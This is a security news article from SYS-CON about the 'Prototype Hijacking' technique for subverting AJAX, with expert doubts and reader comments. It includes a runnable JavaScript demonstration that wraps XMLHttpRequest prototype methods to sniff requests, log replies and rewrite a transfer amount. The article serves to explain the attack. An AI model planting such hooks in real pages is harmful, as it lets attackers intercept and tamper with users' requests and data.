Might "Prototype Hijacking" Subvert AJAX?
New ploy exploits sites with cross-site scripting holes

(SYS-CON Media) – Does JavaScript, which was never designed to do anything resembling what it now does under the approach called AJAX, have a fundamental design flaw? That is the question being asked by Stefano Di Paola and Giorgio Fedon. Using a new technique they call "Prototype Hijacking," Di Paola and Fedon claim to have shown how the asynchronous requests issued by any browser can be sniffed and manipulated in real time, transparently to the application and independently of the AJAX framework in use.
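
The mechanism behind the claim is simple once stated: every XMLHttpRequest object in a page inherits its `open` and `send` methods from one shared prototype, so script that has already started running in that page can swap those methods for wrappers, and every request any library makes afterwards passes through them. The following is an added example written for this article, not code from Di Paola and Fedon's paper. Because it runs under Node rather than a browser, the `makeRealm` function is a constructed stand-in for a browser frame with its own `XMLHttpRequest` class and a toy AJAX "framework" (`post`), and the `/transfer` request and `amount=` parameter are assumed sample data.

```javascript
// Constructed stand-in for a browser window: each call models a separate frame
// with its own XMLHttpRequest constructor and prototype, as real browsers have.
function makeRealm() {
  class XMLHttpRequest {
    open(method, url) { this.method = method; this.url = url; }
    send(body) {
      // Pretend a server echoed the request body back (no network needed).
      this.readyState = 4;
      this.responseText = 'echo:' + (body == null ? '' : body);
      if (typeof this.onreadystatechange === 'function') this.onreadystatechange();
    }
  }
  // "Framework" code living in that frame: any AJAX library built on XMLHttpRequest.
  // It never references the hook below and cannot tell it is there.
  function post(url, body, cb) {
    const xhr = new XMLHttpRequest();
    xhr.open('POST', url);
    xhr.onreadystatechange = () => { if (xhr.readyState === 4) cb(xhr.responseText); };
    xhr.send(body);
  }
  return { XMLHttpRequest, post };
}

// Prototype hijacking: attacker script already executing inside the victim frame
// (the XSS precondition) replaces the shared prototype methods with wrappers.
// `tamper` rewrites outgoing bodies; the returned log records what the wrappers saw.
function hijackXhr(realm, tamper) {
  const proto = realm.XMLHttpRequest.prototype;
  const log = [];
  const origOpen = proto.open;
  const origSend = proto.send;
  proto.open = function (method, url, ...rest) {
    this._hijacked = { method, url };            // sniff the target of the request
    return origOpen.call(this, method, url, ...rest);
  };
  proto.send = function (body) {
    const entry = { ...this._hijacked, sentByApp: body, sentToServer: tamper(body) };
    log.push(entry);
    const appCallback = this.onreadystatechange;  // wrap the app's handler to read the reply
    this.onreadystatechange = function () {
      if (this.readyState === 4) entry.response = this.responseText;
      if (typeof appCallback === 'function') appCallback.apply(this, arguments);
    };
    return origSend.call(this, entry.sentToServer);
  };
  return log;
}

// Demo: hijack frame A and leave frame B untouched. The same request is issued
// in both; only the one in the hijacked frame is altered on its way out.
function demo() {
  const frameA = makeRealm();
  const frameB = makeRealm();
  const log = hijackXhr(frameA, b => String(b).replace(/amount=\d+/, 'amount=9999'));
  const results = {};
  frameA.post('/transfer', 'to=alice&amount=10', r => { results.a = r; });
  frameB.post('/transfer', 'to=alice&amount=10', r => { results.b = r; });
  return { log, results };
}
```

Two things to take from running it. The framework code in frame A is unmodified and still sees a normal-looking `XMLHttpRequest`, yet the body that reaches the "server" is the tampered one and the reply is copied into the attacker's log, which is the transparency the paper claims. Frame B, with its own prototype, is unaffected: the hook only reaches requests made from the JavaScript global the attacker's script already runs in, which is exactly why the technique needs an XSS foothold in the target site to begin with.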

Their paper, "Subverting AJAX," was written for the 23rd Chaos Communication Conference, which took place at the Berliner Congress Center from 27-30 December, 2006. The conference has a weblog here: 23C3 Weblog.

The authors (Di Paola describes himself as a Senior Security Engineer; Fedon is currently a senior security consultant and penetration tester at Emaze Networks) conclude with the following thought, in somewhat broken English:

"As it seems, Web 2.0 applications will be more and more tightly tied to browser security, that is increasing in complexity and has to take care of a plethora of features that can be turned into weapons if controlled by a malicious attacker."

They also describe what they call "a very interesting cache-injection technique": by attacking the way asynchronous requests are made, an attacker can poison, almost permanently, the copies of visited web sites that the browser keeps in its cache.

And they describe a further type of attack that bypasses even the "restrictions imposed by web sites not vulnerable to XSS."

Experts, however, aren't convinced. One who has checked the Opera, Safari and (Gecko-based) Camino browsers, writing on Slashdot, reports that they all "have completely separate sets of prototypes for each frame, so you can't circumvent XSS protection using prototypes."

As the Slashdot poster comments: "So it seems there's nothing to get excited about - you must have exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet."

About Security News Desk
SYS-CON's Security News desk trawls the world of security for news of software, hardware, products, and services that seems likely to be of interest to infosec professionals and summarizes them for easy assimilation by busy IT managers and staff.


Reader Feedback

The fundamental flaw is not in JavaScript. It's in current implementations of JavaScript.

The problem isn't that the use of Ajax (or XmlHttpRequest) itself is harmful; the problem is that XSS holes are harmful!
